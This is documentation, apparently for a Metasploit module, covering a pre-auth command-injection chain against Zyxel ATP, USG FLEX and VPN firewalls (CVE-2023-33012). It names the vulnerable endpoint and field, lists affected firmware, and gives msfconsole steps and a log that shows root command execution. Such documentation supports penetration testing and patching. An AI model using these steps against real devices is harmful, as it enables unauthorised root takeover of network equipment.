## Vulnerable Application
This module exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple Zyxel device models.
The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a
new configuration to /ztp/cgi-bin/parse_config.py by appending a command to the `option ipaddr ` field.

The command injection is length limited to 0x14 bytes and is why this exploit chains a .qsr file write vulnerability as
well in order to write the payload to a file which has no length limit and then call the payload with the command
injection.

Two caveats of this exploit chain were described by Jacob Baines in the following
[blog post](https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot).
1. In order for the target to be vulnerable Cloud Management Mode (SD-WAN mode) must be enable (it is not by default).
2. The target can only be exploited once due to the order of operations in which the exploit functions.

| Product                           | Affected Versions               |
|-----------------------------------|----------------------------------|
| ATP                               | V5.10 through V5.36 Patch 2      |
| USG FLEX                          | V5.00 through V5.36 Patch 2      |
| USG FLEX 50(W) / USG20(W)-VPN     | V5.10 through V5.36 Patch 2      |
| VPN                               | V5.00 through V5.36 Patch 2      |

### Setup

To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.

## Options

### WRITEABLE_DIR

This indicates the location where you would like the payload and exploit stored, as well
as serving as a location to store the various files and directories created by the exploit itself.
The default value is `/tmp`

## Verification Steps

1. Start msfconsole
1. Do: `use zyxel_parse_config_rce`
1. Set the `RHOST` and `LHOST`
1. Run the module
1. Receive a Meterpreter session as the `root` user.

## Scenarios
### Mock USG Flex environment
```
msf exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linux/http/zyxel_parse_config_rce) > set cmd id
cmd => id
msf exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
AllowNoCleanup => true
msf exploit(linux/http/zyxel_parse_config_rce) > run

[*] Attempting to upload the payload via QSR file write...
[+] File write was successful.
[+] Command output:
uid=0(root) gid=0(root) groups=0(root)

[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
[*] Exploit completed, but no session was created.
```
